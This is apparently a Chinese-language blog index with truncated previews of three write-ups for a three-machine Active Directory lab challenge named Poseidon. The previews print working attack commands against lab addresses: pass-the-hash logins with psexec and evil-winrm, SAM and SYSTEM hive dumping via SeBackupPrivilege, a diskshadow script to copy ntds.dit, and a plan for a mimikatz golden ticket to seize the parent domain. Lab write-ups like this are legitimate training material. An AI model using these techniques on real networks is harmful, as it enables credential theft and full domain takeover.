發表文章

Challenge 8 - Poseidon(2)

圖片
 Challenge 8 - Poseidon(2) 目前三台電腦已拿下第三台子網域的 Member Server 以及第二台的子網域 Domain Controller 的 Domain Admins 帳號 administrator 下一步是朝向主網域的第一台 Domain Controller 參考這一篇文章 :  https://cryptex.blog/posts/childtoea/ 簡單一句話就是如果已經入侵到了子網域的 DC,那麼就可以拿下整個父域 手法是透過子網域的 krbtgt HASH 值與父域的 Enterprise Admin SID 透過 minikatz 製作黃金票證獲取 Enterprise Admin 事前準備工作需要的內容  - 子網域的 KRBTGT HASH 值  - 子網域中目標用戶的名稱  - 子網域的 FQDN  - Root Domain 的 Enterprise Admins 群組的 SID  - mimikatz 工具  - PowerView.ps1 模組 先使用之前獲取的子網域 Domain Admins 帳號 administrator 的 HASH 登入到子網域 DC impacket-psexec -hashes :3bcdd818f7ec942ac91aa30d8db71927 administrator@192.168.232.162 然後修改 administrator 的密碼為 Oscp#1234,net user administrator Oscp#1234 匯入 PowerView.ps1 然後輸入 Get-ADTrust -Filter * 查看現有的 Trust 機制 使用 AD 管理工具一樣可以看到信任關係 看的出來是雙向信任的關係 也可以使用此指令查看,([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() 都顯示 "bidirectional",表示是雙向信任的關係 子網域的 SID,Get-DomainSID,S-1-5-21-4168247447-17...

Challenge 8 - Poseidon(1)

圖片
 Challenge 8 - Poseidon(1) 檢視 jackie 的權限,whoami /priv 發現有 SeBackupPrivilege 導出 sam & system reg save hklm\sam c:\users\jackie\Documents\sam reg save hklm\system c:\users\jackie\Documents\system └─$ impacket-secretsdump -sam ./sam -system ./system LOCAL Administrator:500:aad3b435b51404eeaad3b435b51404ee:8fea81a19d172de0c445c8072b9a1697:::  使用 impacket-psexec,└─$ impacket-psexec -hashes :8fea81a19d172de0c445c8072b9a1697 administrator@192.168.163.162 evil-winrm,└─$ evil-winrm -i 192.168.163.162 -u Administrator -H 8fea81a19d172de0c445c8072b9a1697 都無法登入 看來要改 COPY ntds.dit 檔案,使用 robocopy 進行複製出現執行中無法複製 參考這一篇 :  https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/ 編輯一個 raj.dsh 檔案如下 set context persistent nowriters add volume c: alias raj create expose %raj% z: 編輯完畢後使用 unix2dos 進行轉換,└─$ unix2dos raj.dsh  建立一個 c:\Temp 資料夾,上傳 raj.dsh 檔案然後執行 diskshadow /s raj.dsh 再複製一次 ntds.dit,使用指令  robocopy /b z:\windows\ntds . ntds. dit 成功複製出來了 依樣抓回 ka...

Challenge 8 - Poseidon(0)

圖片
 Challenge 8 - Poseidon(0) 最近真的新的 LAB 連發,又多了一個 Challenge 8 : Poseidon 剛好近期有空,開來看看吧,又是一個三台的組合,應該又是 AD 題組 跟前一個題組 zeus 很像,都是三台面向使用者沒有內網的機器 ping 看看,看來三台都是 Windows Rustscan 掃掃看,看來第一台一樣是 DC └─$ rustscan -a 192.168.163.161 --scripts none --ulimit 5000 | tee rustscan 第二台看來也像 DC └─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第三台,└─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第一台 161 nmap 資訊 Domain : poseidon.yzx,電腦名稱 dc01 NetBIOS_Domain_Name : poseidon 第二台 162 nmap 資訊 這一台看來是 Sub Domain 的 DC,FQDN: dc02.sub.poseidon.yzx NetBIOS_Domain_Name : sub 第三台 163 nmap 資訊 ldapsearch 161,ldapsearch -v -x -b "DC=poseidon,DC=yzx" -H "ldap://192.168.163.161" "(objectclass=*)" ldapsearch 162,ldapsearch -v -x -b "DC=sub,DC=poseidon,DC=yzx" -H "ldap://192.168.163.162" "(objectclass=*)" 預設 smbclient 列舉都爬不到東西 帶入 poseidon\guest & sub\guest SMB 也都爬不到資訊 爬看看 161 Domain 的使用者,└─$ ./kerbrute_linux_amd64...